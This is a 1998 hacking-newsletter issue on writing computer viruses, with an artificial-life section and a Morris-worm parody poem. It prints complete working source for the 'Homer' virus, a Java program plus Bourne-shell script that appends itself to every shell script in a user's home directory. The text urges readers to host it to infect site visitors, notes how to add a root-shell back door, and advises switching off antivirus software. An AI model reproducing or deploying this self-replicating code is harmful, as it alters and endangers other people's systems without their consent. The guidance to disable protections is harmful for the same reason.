Warning: if you live in a country where information on how to write computer
viruses is illegal, please delete this email now!
___________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 3 No. 7, part 2
Introduction to Computer Viruses
____________________________________________________________
Part Two:
* How to write them
* How to write them and not get lynched
* Artificial life
* Virus humor
****************************************************************
How to Write Them
Wait! Wait! This is supposed to be about mostly harmless hacking! Is
Carolyn really going to tell all the newbies how to write computer viruses?
Yes, I am. I will tell you how to really write computer viruses, not just
use some lamer program like Virus Workshop that writes weak, helpless little
viruses for you. However, to use the information in this Guide you must know
how to compile Java or use assembly language. If you can master these, you
probably have enough willingness to work hard that you will not abuse the
knowledge of how to code viruses. At least that's my theory -- please don't
prove me wrong!
Besides, the only way to fight dangerous viruses is to know exactly how to
write them.
First, if you are like me, you may already be struggling with the
temptation to install a Java virus on your Web site to infect unwary
visitors. Yes, I really am going to show you how to do this. However, it
is a (mostly) harmless virus. (Aw, darn!)
****************************************************************
You can go to jail warning: This Guide only offers source code for a
(mostly) harmless virus. However, some people are so terrified of and
ignorant about viruses that you just might get into big trouble if you
really put this Java virus on your Web page. Suggestion: if you absolutely
cannot resist, how about putting it on a link with the flashing message
"Danger! Do not click here! If you do, you might catch a virus! Honest!!!
Would I lie to you?!!??"
****************************************************************
****************************************************************
You can get punched in the nose warning: Some people don't care if a virus
is (mostly) harmless or even entirely harmless. These guys are terrified of
viruses. If some guy who browses your Web site catches your virus and has a
fit and sues you or tracks you down and punches you in the nose, remember,
you asked for it. Don't expect me to feel sorry for you.
*****************************************************************
OK, folks, here it is, a Java virus. The following source code for the
Homer virus is available on the floppy disk that accompanies "The Giant
Black Book of Computer Viruses" by Dr. Mark Ludwig:
/* Homer.java by Mark D. LaDue */
/* December 7, 1996 */
/* Copyright (c) 1996 Mark D. LaDue
You may study, use, modify, and distribute this example for any purpose.
This example is provided WITHOUT WARRANTY either expressed or implied. */
/* This Java application infects your UNIX system with a Bourne shell
script virus, homer.sh. homer.sh is kind enough to announce itself
and inform you that "Java is safe, and UNIX viruses do not exist"
before finding all of the Bourne shell scripts in your home directory,
checking to see if they've already been infected, and infecting
those that are not. homer.sh infects another Bourne shell script
by simply appending a working copy of itself to the end of that shell
script. */
import java.io.*;
class Homer {
public static void main (String[] argv) {
try {
String userHome = System.getProperty("user.home");
String target = "$HOME";
FileOutputStream outer = new FileOutputStream(userHome + "/.homer.sh");
String homer = "#!/bin/sh" + "\n" + "#-_" + "\n" +
"echo \"Java is safe, and UNIX viruses do not exist.\"" + "\n" +
"for file in `find " + target + " -type f -print`" + "\n" + "do" +
"\n" + " case \"`sed 1q $file`\" in" + "\n" +
" \"#!/bin/sh\" ) grep '#-_' $file > /dev/null" +
" || sed -n '/#-_/,$p' $0 >> $file" + "\n" +
" esac" + "\n" + "done" + "\n" +
"2>/dev/null";
byte[] buffer = new byte[homer.length()];
homer.getBytes(0, homer.length(), buffer, 0);
outer.write(buffer);
outer.close();
Process chmod = Runtime.getRuntime().exec("/usr/bin/chmod 777 " +
userHome + "/.homer.sh");
Process exec = Runtime.getRuntime().exec("/bin/sh " + userHome +
"/.homer.sh");
} catch (IOException ioe) {}
}
}
If you post this source code to you web site -- it will do nothing! That
is because this code must first be compiled in order to do its business. If
you don't know how to compile Java source code for your Web page, you don't
know enough to safely handle viruses.
Also, you need to put the code for the shell script, homer.sh, on your Web
site so this Java program can ship it to your victims. Following is the
code for homer.sh:
#!/bin/sh
#-_
echo "Java is safe, and UNIX viruses do not exist."
for file in `find $HOME -type f -print`
do
case "`sed 1q $file`" in
"#!/bin/sh" ) grep '#-_' $file > /dev/null || sed -n '/#-_/,$p' $0
>> $file
esac
done
2>/dev/null
In case you are wondering what this virus does -- it flashes a message on
the victim's screen reading "Java is safe, and UNIX viruses do not exist."
For more information on how shell scripts work, see the GTMHHs on shell
programming.)
Homer is a harmless, humorous shell virus. However, it doesn't take a
genius to see how it could be given a destructive payload by modifying
homer.sh. If someone were to be dumb enough to surf your booby-trapped
Website while logged in as root, it would be trivial to use a homer.sh
modified to give you a root shell with your very own back door.
However, in general Java viruses are not terribly dangerous because they
run so slowly. This gives their victims time to get suspicious and
terminate these programs. Presumably a Java virus would take so long to
create a root shell and back door that the victim would kill the process in
time.
********************************************************************
Newbie note: Don't ever surf the Web while logged in as root. Don't ever try
to break into someone else's computer while logged in as root. Any time you
are running as root, it is really easy for you to mess up your Unix
computer. If you check out the phf abuse log at the Hacker Wargame section
of http://www.happyhacker.org, you will see that quite a few people have
tried to break into our webserver while running a Web browser and logged in
as root.
********************************************************************
The problem of some programs running really slowly is a major reason why
you can't do much as a virus or antivirus programmer unless you also learn
at least one assembly language. Assembly language is fast! No time for the
victim to react! It also makes it easy for you to do complex and
infuriating things while a computer is only beginning to boot up. For DOS
and Windows you will need an assembly language compiler for 80x86
(substitute 2, 3, 4, 5)/Pentium type computers. Two of the best are
Microsoft Macro Assembler and Borland Turbo Assembler. Places where you can
get them (you have to pay, they are not free) include
http://www.pparadise.com and http://www.supershops.com.
If you are really serious about learning how to write viruses and
antiviruses, you may want to get the "Giant Black Book of Computer Viruses,
Second Edition," by Dr. Mark Ludwig. Not only is he one of the world's
leading virus researchers -- he also is the only one I have discovered who
will tell you EXACTLY in almost endless detail how to write viruses and
antiviruses of many sorts. However, this book is not for newbies. He
assumes you already know a great deal about DOS, Windows and Unix, and are a
programmer.
It comes with a floppy disk with source code for many viruses. Here are
some hints for how to extract these viruses from this disk successfully and
without killing your computer.
1) This disk is designed to be installed from MS-DOS. If you try to install
it from Windows, it will give you a runtime error. If you don't know how to
work from MS-DOS, you aren't ready for this book.
2) The installation program for Dr. Ludwig's virus disk ought to activate
your antivirus program. If it doesn't, your antivirus program is even more
worthless than most. To be certain that you can succeed in installing a
directory full of viruses, deactivate your antivirus program(s) first. If
this sounds too scary to you, don't buy this book! If you mess up your
computer by following my advice, too bad, that's what you get for playing
with viruses.
3) Here's what Dr. Ludwig's installation program will tell you:
! ! W A R N I N G ! !
If you're like most computer users, you've grown used to being pampered.
That's a nice way of saying that software developers no longer expect you to
have a brain. Like a stupid monkey, all you need to do is put the CD in the
drive and let it auto-execute, or put the floppy disk in the drive and type
"setup".
If that's what you want and need, THEN DELETE THIS SOFTWARE OFF YOUR
COMPUTER IMMEDIATELY AND DESTROY THE DISK WITH A HAMMER! We're really not
kidding about that. This disk is for thinking beings. Improperly used it
could be very dangerous. It could ruin your computer, your career and your
life. THAT IS NOT A JOKE.
DO NOT EXECUTE ANY PROGRAM IN THIS DIRECTORY UNLESS YOU KNOW WHAT IT DOES.
DO NOT EXECUTE ANY PROGRAM IN THIS DIRECTORY EXCEPT IN A CONTROLLED ENVIRONMENT.
I suppose now you just can't resist buying this book. Guess what -- you
can't get it in any bookstore. They are all afraid of getting sued. Also,
in some countries, mere possession of "The Giant Black Book of Computer
Viruses" is illegal. Just to be safe, you might want to delete this GTMHH
right now and only read it from our Web site at http://www.happyhacker.org.
If you are absolutely determined to get this book, within the US you can
order it from American Eagle Publications by phoning toll free 800-719-4957;
outside the US you can order it by calling (insert country code here)
520-367-1621. It costs $39.95. This price includes the floppy disk with
all that stuff that upsets your antivirus program. Shipping and handling
costs are extra.
If you live within the US, you can also buy "The Giant Black Book of
Computer Viruses" by sending $44.95 (this includes shipping by Priority
mail, which is supposed to take two days) made out to M/B Research, PO Box
1520, Cedar Crest NM 87008. That's my company. Sorry, I'm not going to
ship the book outside the US because I don't know in which countries it is
illegal. I would feel really bad if you were to go to your post office to
pick up the book and instead got picked up by the police.
American Eagle can get the book to you at the lowest shipping cost, if you
don't mind it taking a long time to get to you. I can get it to you faster,
but it costs you more for the shipping.
If you want to buy "The Giant Black Book of Computer Viruses" with a credit
card over the Internet, check out http://www.amazon.com and
http://www.infowar.com. Amazon.com will usually take much longer to get the
book to you than any other book seller, however.
How to Write Viruses and Not Get Lynched
Just imagine how people will react when you are at some party full of
ambitious young professionals. Everyone is trading business cards. You
hand out ones that say "George the Doomster. Computer virus design. Free
samples, muhahaha." You'll be real popular, yes sirree!
OK, so you only plan on writing harmless viruses. Try to tell that to the
lynch mob that may pay you a visit when they discover it was you who wrote
the code that made their Win95 computers come down with habitual General
Protection Faults. Remember, even the virus designer who has the best of
intentions may write a seemingly harmless or even beneficial virus that
turns out to have a bug in the code that accidentally does harm. Also,
since the best viruses are memory resident (they hide in RAM memory) they
really can help create General Protection Faults just by hogging too much
memory.
Besides, people like to pick and choose what programs run on their
computers. Imagine that! If you design a virus so it will sneak into
computers, don't expect people to thank you and admire you. If you do
choose to code a virus, please consider coding politeness into it. You
could have it ask permission to take up residence on each new computer and
leave when asked. Shoot, if I could find a copy of that virus that makes a
mirror image of Windows desktop graphics each Saturday, and if I knew how to
uninstall it without paying a bunch of money to Panda Software, I'd enjoy
sharing my computer with it.
Artificial Life
Now that you understand the basic principles of virus coding, let's take a
look at the Big Time: using your programming talents to create -- or battle
against -- artificial life.
Just what is artificial life (insiders call it "alife"), anyhow? According
to the most prominent researcher in this field, Dr. Chris Langton,
artificial life is "... the study of man-made systems that exhibit
behaviours characteristic of natural living systems." -- "Artificial Life,"
edited by Chris Langton, Addison-Wesley, 1988. Youc an get this book from
http://www.amazon.com.
There are three primary forms of alife. Some alife is growing -- or trying
to grow -- in test tubes full of RNA (ribonucleic acid) or other chemicals.
The second major form of alife consists of computerized robots which their
creators hope to will someday achieve the ability to adapt and reproduce
without human assistance. The third type of alife is computer programs that
exist, adapt, reproduce and evolve in the virtual landscape of cyberspace --
what we know as computer viruses.
Of all the forms of artificial life, computer viruses are the only ones so
far that reproduce, escape the laboratory and take up life in the wild.
Viruses that follow rules of good behavior -- only living in computers when
invited -- are often created by alife researchers.
How can you meet and get involved with alife designers?
Http://alife.santafe.edu/alife/events/ and http://alife6.alife.org/ offer
listings of upcoming conferences on this topic from around the world.
Closely related to artificial life is the Berkeley Initiative in Soft
Computing (BISC) at http://http.cs.berkeley.edu/projects/Bisc. If you want
to volunteer to harbor artificial life viruses on your computer or LAN, you
can probably find a researcher at one of these sites who would be happy to
give you some of his or her harmless (you hope) creations.
American Eagle also sells a book "Computer Viruses, Artificial Life and
Evolution" by Dr. Ludwig (American Eagle, 1993). It costs $26.95 and is
almost impossible to get unless you order it directly from American Eagle.
Virus Humor
As we end this Guide, please remember that with the right attitude, viruses
actually can be fun! Next time your computer gets infected by one, just
remember, don't worry, be happy. Following is some virus humor to show how
other people have coped cheerfully with an encounter with this pesky new
life form.
"The Worm Before Christmas"
by Clement C. Morris
(a.k.a. David Bradley, Betty Cheng, Hal Render,
Greg Rogers, and Dan LaLiberte)
'Twas the night before finals, and all through the lab
Not a student was sleeping, not even McNabb.
Their projects were finished, completed with care
In hopes that the grades would be easy (and fair).
The students were wired with caffeine in their veins
While visions of quals nearly drove them insane.
With piles of books and a brand new highlighter,
I had just settled down for another all nighter ---
When out from our gateways arose such a clatter,
I sprang from my desk to see what was the matter;
Away to the console I flew like a flash,
And logged in as root to fend off a crash.
The windows displayed on my brand new Sun-3,
Gave oodles of info --- some in 3-D.
When, what to my burning red eyes should appear
But dozens of "nobody" jobs. Oh dear!
With a blitzkrieg invasion, so virulent and firm,
I knew in a moment, it was Morris's Worm!
More rapid than eagles his processes came,
And they forked and exec'ed and they copied by name:
"Now Dasher! Now Dancer! Now, Prancer and Vixen!
On Comet! On Cupid! On Donner and Blitzen!
To the sites in .rhosts and host.equiv
Now, dash away! dash away! dash away all!"
And then in a twinkling, I heard on the phone,
The complaints of the users. (Thought I was alone!)
"The load is too high!" "I can't read my files!"
"I can't send my mail over miles and miles!"
I unplugged the net, and was turning around,
When the worm-ridden system went down with a bound.
I fretted. I frittered. I sweated. I wept.
Then finally I core dumped the worm in /tmp.
It was smart and pervasive, a right jolly old stealth,
And I laughed, when I saw it, in spite of myself.
A look at the dump of that invasive thread
Soon gave me to know we had nothing to dread.
The next day was slow with no network connections,
For we wanted no more of those pesky infections.
But in spite of the news and the noise and the clatter,
Soon all became normal, as if naught were the matter.
Then later that month while all were away,
A virus came calling and then went away.
The system then told us, when we logged in one night:
"Happy Christmas to all! (You guys aren't so bright.)"
[ Note: The machines dasher.cs.uiuc.edu,
dancer.cs.uiuc.ed, prancer.cs.uiuc.edu, etc. have
been renamed deer1, deer2, deer3, etc. so as not
to confuse the already burdened students who use
those machines. We regret that this poem reflects
the older naming scheme and hope it does not confuse
the network administrator at your site. -Ed.]
_______________________________________________________________________
Where are those back issues of GTMHHs and Happy Hacker Digests? Check out
the official Happy Hacker Web page at http://www.happyhacker.org.
We are against computer crime. We support good, old-fashioned hacking of the
kind that led to the creation of the Internet and a new era of freedom of
information. So don't email us about any crimes you have committed! And
don't expect us to come to your rescue if you crash 100 million computers
with some new Java virus you just unleashed.
To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless
Hacking, please email hacker@techbroker.com with message "subscribe
happy-hacker" in the body of your message.
Copyright 1998 Carolyn P. Meinel . You may forward,
print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site
as long as you leave this notice at the end.
_________________________________________________________
Carolyn Meinel
M/B Research -- The Technology Brokers
http://techbroker.com
- Articles
- Authors
- Blogs
- ISA Server Articles
- Links
- Message Boards
- Newsletter
- RSS
- Security Tests
- Services
- Software
- White Papers
Introduction to Computer Viruses 2
|
|
|
Featured Links*
Become a WindowSecurity.com member!
Discuss your security issues with thousands of other network security experts. Click here to join!